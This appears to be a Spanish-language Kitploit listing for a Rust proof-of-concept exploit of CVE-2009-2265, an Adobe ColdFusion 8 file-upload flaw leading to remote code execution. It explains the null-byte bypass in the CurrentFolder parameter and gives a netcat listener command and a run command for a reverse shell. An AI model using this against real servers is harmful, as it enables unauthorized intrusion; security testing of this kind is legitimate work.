Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2009-2265 — Una implementación en Rust del POC para el exploit CVE-2009-2265, dirigido a Adobe ColdFusion 8. | Kitploit
Herramientas/GitHubGitHub/nika0x38/cve-2009-2265
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubnika0x38/cve-2009-2265

CVE-2009-2265

Una implementación en Rust del POC para el exploit CVE-2009-2265, dirigido a Adobe ColdFusion 8.

Ver Repositorio
hace 10 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2009-2265 - Adobe ColdFusion 8 Subida de Archivos RCE

RustSecurity

Una implementación en Rust del POC para el exploit CVE-2009-2265, dirigida a Adobe ColdFusion 8.


Resumen de la Vulnerabilidad

Esta vulnerabilidad permite a un atacante no autenticado subir archivos arbitrarios a un directorio accesible desde la web en un servidor que ejecuta Adobe ColdFusion 8, lo que conduce a la Ejecución Remota de Código (RCE).

Detalles Técnicos

  • Vulnerabilidad: Directory Traversal mediante Inyección de Byte Nulo
  • Componente: conector upload.cfm de FCKeditor
  • Parámetro: CurrentFolder
  • Impacto: Ejecución Remota de Código (RCE)
  • Software Afectado: Adobe ColdFusion 8.0.1 y anteriores

Descripción

La vulnerabilidad se encuentra en la funcionalidad de subida de archivos del componente FCKeditor ubicado en /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm. El parámetro HTTP GET CurrentFolder no se sanea adecuadamente, lo que permite un ataque de inyección de byte nulo (%00).

Al construir una solicitud donde el parámetro CurrentFolder se establece en /<filename>.jsp%00, un atacante puede omitir las comprobaciones de extensión del servidor. El sistema subyacente (a menudo Java) interpreta el byte nulo como el final de la cadena, tratando el nombre de archivo como <filename>.jsp. Esto permite al atacante subir un archivo JSP malicioso. El servidor guarda este archivo en un directorio de acceso público (/userfiles/file/), desde donde puede ejecutarse simplemente accediendo a su URL.

Este POC automatiza el proceso generando un payload de reverse shell JSP, subiéndolo mediante la vulnerabilidad de byte nulo y ejecutándolo para obtener una shell en el sistema objetivo.

Uso

Sigue estos pasos para compilar y ejecutar el exploit.

Paso 1: Configurar un Listener de Netcat

Antes de ejecutar el exploit, inicia un listener en tu máquina local para capturar la reverse shell entrante.

root@kitploit:~

nc -lnvp <attacker-port>

Paso 2: Ejecutar el Exploit

Ejecuta el binario compilado, proporcionando tu host/puerto local para la reverse shell y el host/puerto del objetivo remoto.

root@kitploit:~

cargo run -- --lhost <LHOST> --lport <LPORT> --rhost <RHOST> --rport <RPORT>

Después de que el script ejecute el payload, deberías recibir una conexión en tu listener de Netcat.

Descargo de Responsabilidad

Esta herramienta es únicamente para fines educativos y de pruebas de penetración autorizadas. Úsala de forma responsable y solo en sistemas que poseas o para los que tengas permiso explícito.

Descargar herramienta